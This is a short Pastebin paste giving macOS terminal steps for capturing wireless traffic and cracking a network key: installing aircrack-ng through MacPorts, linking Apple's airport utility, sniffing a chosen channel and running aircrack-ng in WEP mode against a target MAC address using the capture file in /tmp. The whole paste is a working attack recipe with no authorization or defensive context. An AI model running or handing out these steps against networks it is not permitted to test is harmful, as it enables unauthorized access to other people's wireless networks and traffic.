Guest User

Untitled

a guest
Sep 1st, 2016
77
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.51 KB | None | 0 0
  1. //Install Macports.
  2. //Install aircrack-ng:
  3. sudo port install aircrack-ng
  4. //Install the latest Xcode, with the Command Line Tools.
  5. //Create the following symlink:
  6. sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/sbin/airport
  7. //Figure out which channel you need to sniff:
  8. sudo airport -s
  9.  
  10. sudo airport en1 sniff [CHANNEL]
  11. //New Terminal Window
  12. aircrack-ng -1 -a 1 -b [TARGET_MAC_ADDRESS] [CAP_FILE]
  13. // Notes: the cap_file will be located in the /tmp/airportSniff*.cap.
Add Comment
Please, Sign In to add comment